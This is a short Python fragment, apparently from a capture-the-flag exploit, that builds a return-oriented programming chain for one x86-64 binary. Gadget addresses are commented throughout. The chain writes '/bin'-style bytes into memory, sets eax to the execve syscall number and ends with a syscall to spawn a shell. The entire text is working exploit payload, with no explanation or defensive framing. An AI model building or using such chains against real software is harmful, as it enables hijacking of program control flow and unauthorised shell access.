payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x40125c)+p64(0x420956)
# 0x0000000000420956: xchg eax, ebp; ret; 
payload += p64(0x41e8f6)
# 0x000000000041e8f6: pop rbx; pop rbp; jmp rax; 
payload += p64(0x6e69622f)+p64(0x4530ad)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x40125c)+p64(0x420956)
# 0x0000000000420956: xchg eax, ebp; ret; 
payload += p64(0x41e8f6)
# 0x000000000041e8f6: pop rbx; pop rbp; jmp rax; 
payload += p64(0x68662f)+p64(0x4530b1)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x0)+p64(0x4017ce)
# 0x00000000004017ce: pop r13; pop r14; pop r15; ret; 
payload += p64(0x4017d1)+p64(0x0)+p64(0x0)+p64(0x42977a)
# 0x42977a: mov edx, edi ; call r13
payload += b''
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x3b)+p64(0x420956)
# 0x0000000000420956: xchg eax, ebp; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x453070)+p64(0x43665d)
# 0x000000000043665d: syscall; 
payload += b''
